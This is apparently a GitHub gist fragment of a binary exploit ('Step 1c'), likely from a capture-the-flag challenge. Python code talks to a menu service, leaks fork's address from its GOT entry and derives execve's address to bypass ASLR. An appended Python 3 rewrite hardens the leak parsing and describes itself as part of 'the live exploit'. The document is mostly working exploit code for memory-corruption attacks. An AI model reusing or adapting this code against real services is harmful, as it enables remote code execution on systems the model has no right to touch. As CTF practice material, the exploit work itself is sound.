Last active December 15, 2015 18:39
# Step 1c --- Get the address of execve
# Assumes `nc` (socket wrapper with read_until/write) and `location_got_fork`
# come from the earlier steps; the packing helpers are defined here via struct.
import struct
def dword_to_bitstring(value):   # 32-bit int -> little-endian bytes (i386)
    return struct.pack("<I", value)
def bitstring_to_dword(data):    # little-endian bytes -> 32-bit int
    return struct.unpack("<I", data)[0]
LEAKFORKADDR = dword_to_bitstring(location_got_fork)   # packed GOT entry of fork (leak payload)
nc.read_until("Your choice: ")
nc.write("1" + "\n")                # menu option 1
nc.read_until("Insert name: ")
# The echoed name carries the leaked fork pointer between a 4-byte prefix
# and the 8-byte ":ENFORK:" marker; slice both off and unpack the address
nc.read_until("Uranium in nuclear plant \"")
addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8])
addrexecve = addrfork + 0x320       # fixed fork->execve distance in this libc build
print "[+] Address of fork :", hex(addrfork)
print " > Address of execve :", hex(addrexecve)
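The fragment above slices the echoed name with `[4:-8]` and unpacks it blindly, which breaks in two practical ways: a NUL byte inside the leaked pointer ends the C-string echo early (fewer than 4 bytes come back), and a 0x00 or 0x0a byte inside the packed GOT address cuts the name payload short on the way in. The Python 3 helpers below are an added example, not code from the gist; they reproduce the same parsing offline and add those checks. Assumptions: the response layout is a 4-byte prefix, the pointer, then `:ENFORK:` (inferred from the slice), the target reads the name line-based and echoes it as a C string, and the sample pointer and GOT address are constructed, not captured.

```python
import struct

# Constants taken from the gist: the 4-byte prefix and ":ENFORK:" marker
# around the echoed pointer (from the [4:-8] slice) and the fork->execve
# distance in the target's libc build.
LEAK_PREFIX_LEN = 4
LEAK_MARKER = b":ENFORK:"
EXECVE_MINUS_FORK = 0x320
POINTER_SIZE = 4  # i386 target, 32-bit little-endian pointers


class LeakTruncated(Exception):
    """Fewer pointer bytes than expected came back (see parse_leaked_pointer)."""


def build_leak_payload(got_fork):
    """Pack the GOT slot of fork as the name the target dereferences.

    Assumption: the target reads the name line-based and handles it as a
    C string, so a 0x0a or 0x00 byte inside the packed address would cut
    the payload short. Reject such addresses instead of sending a broken one.
    """
    payload = struct.pack("<I", got_fork)
    for bad in (b"\x00", b"\x0a"):
        if bad in payload:
            raise ValueError("GOT address %#x packs to a byte that truncates the name" % got_fork)
    return payload


def parse_leaked_pointer(response, prefix_len=LEAK_PREFIX_LEN, marker=LEAK_MARKER):
    """Extract the 32-bit pointer echoed between the prefix and the marker.

    Because the echo is a C string, a NUL byte inside the leaked pointer ends
    it early and fewer than 4 bytes come back; struct.unpack would then raise
    a confusing error. Report that case explicitly so the caller can reconnect
    and retry (a new ASLR base gives a different pointer).
    """
    if not response.endswith(marker):
        raise ValueError("leak marker %r not found in response" % marker)
    blob = response[prefix_len:-len(marker)]
    if len(blob) < POINTER_SIZE:
        raise LeakTruncated("got %d of %d pointer bytes (NUL inside the address?)"
                            % (len(blob), POINTER_SIZE))
    if len(blob) > POINTER_SIZE:
        raise ValueError("unexpected %d bytes between prefix and marker" % len(blob))
    return struct.unpack("<I", blob)[0]


def execve_from_fork(addrfork, delta=EXECVE_MINUS_FORK):
    """Apply the libc-build-specific fork->execve distance, staying in 32 bits."""
    return (addrfork + delta) & 0xFFFFFFFF


def resolve_execve(response):
    """Step 1c on a captured echo: (leaked fork address, derived execve address)."""
    addrfork = parse_leaked_pointer(response)
    return addrfork, execve_from_fork(addrfork)


# Constructed sample echo (not captured from the real target): 4-byte prefix,
# a plausible i386 libc pointer for fork, then the marker.
SAMPLE_RESPONSE = b"xxxx" + struct.pack("<I", 0xF7E5D4B0) + LEAK_MARKER

if __name__ == "__main__":
    fork, execve = resolve_execve(SAMPLE_RESPONSE)
    print("[+] Address of fork : %#x" % fork)
    print(" > Address of execve : %#x" % execve)
    # Truncated echo: the pointer 0xF7E500B0 has a NUL in its low half, so
    # only its first byte (0xB0) survives the C-string echo.
    try:
        parse_leaked_pointer(b"xxxx" + b"\xb0" + LEAK_MARKER)
    except LeakTruncated as e:
        print("[-] retry needed:", e)
```

In the live exploit, `resolve_execve` takes the bytes returned by `nc.read_until(":ENFORK:")`, and a `LeakTruncated` result is the signal to reconnect rather than to continue with a bogus address.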